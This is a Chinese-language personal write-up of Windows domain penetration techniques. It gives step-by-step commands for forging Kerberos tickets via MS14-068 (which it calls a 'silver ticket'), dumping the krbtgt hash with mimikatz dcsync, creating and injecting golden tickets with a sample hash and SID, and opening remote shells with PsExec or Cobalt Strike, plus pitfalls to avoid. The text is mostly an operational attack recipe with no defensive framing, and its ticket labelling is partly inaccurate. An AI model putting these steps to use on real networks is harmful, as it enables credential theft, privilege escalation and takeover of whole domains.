因為工作的原因最近接觸到域內滲透,記錄下摸索過程中遇到的問題。
一、白銀票據的使用
1.使用場景:在拿到一個普通的域成員權限的時候,可以嘗試使用ms14-068偽造一個票據,從而讓我們的域用戶有域管理員權限。
2.注入過程:
whoami /all 獲取sid。
mimikatz.exe "kerberos::purge" 已有的票據
偽造票據
MS14-068.exe -u 用戶名@域名 -p 密碼 -s S-1-5-21-2801287876-2434251727-586288663-1000 -d 域控服務器ip或者機器名(生成的票據在user目錄下,查看域內的機器net view)
注入票據mimikatz.exe kerberos::ptc 證書路徑
查看票據是否注入成功 可以使用mimikatz的kerberos:list,也可以使用cmd的klist命令。
到這里我們就已經擁有了域管理的權限。
3.利用
白銀票據的利用我推薦使用PsExec.exe工具,這個工具可以產生一個交互的cmd。 用法:PsExec.exe \\要訪問的域機器名 cmd
我們可以看到新出現的cmd,就是我們越權訪問的域內機器的cmd,我們可以進行任何操作。
二、黃金票據
1.使用場景:我們得到了域管理員的機器,但是因為版本原因我們抓不到域管理的明文密碼,我們需要進行橫向的滲透,這時候可以使用黃金票據。
2.使用方法:
首先我們先獲取:域控機器的sid、域控機器的aes256或者NTLM hash、域名。
獲取的方法有兩種:
第一種是利用mimikatz,> mimikatz.exe lsadump::dcsync /domain:域名 /user:krbtgt。
第二種是利用cs,access->run mimikatz access->dumphash 這兩個功能獲取。
獲取到我們需要的內容以后,也有兩種方法生成票據。
第一種,mimikatz mimikatz.exe # kerberos::golden /admin:administrator /domain:superman.com /sid:S-1-5-21-259090122-541454442-2960687606 /krbtgt:5bba52548e7171b4529f93f758ef66e8 /ticket:golden.kiribi
PS:這里特別注意我們通過whoami /all 獲取到的sid是S-1-5-21-259090122-541454442-2960687606-500 我們需要去掉最后的-500,不然最后生成的票據是沒有用的,這里踩坑了。krbtgt這個地方可以使用hash也可以用ase256。
最后使用mimikatz kerberos::purge命令先清除票據,在kerberos::ptt 憑證路徑(憑證一般在mimikatz的目錄下)
第二種使用cs,把我們之前獲取到的信息一一填進去,然后在注入到我們要提權的服務器中。
到這里為止黃金票據的生成和注入就結束了,利用部分和白銀票據是一樣的。
注意點:
1.在ms14-068的時候sid是不需要去掉最后一部分的,但是在生成黃金票據的時候需要去掉。
2.我們把票據進行注入的時候必須是域內的機器,用域用戶登錄,使用本地賬戶登錄的時候回出現問題。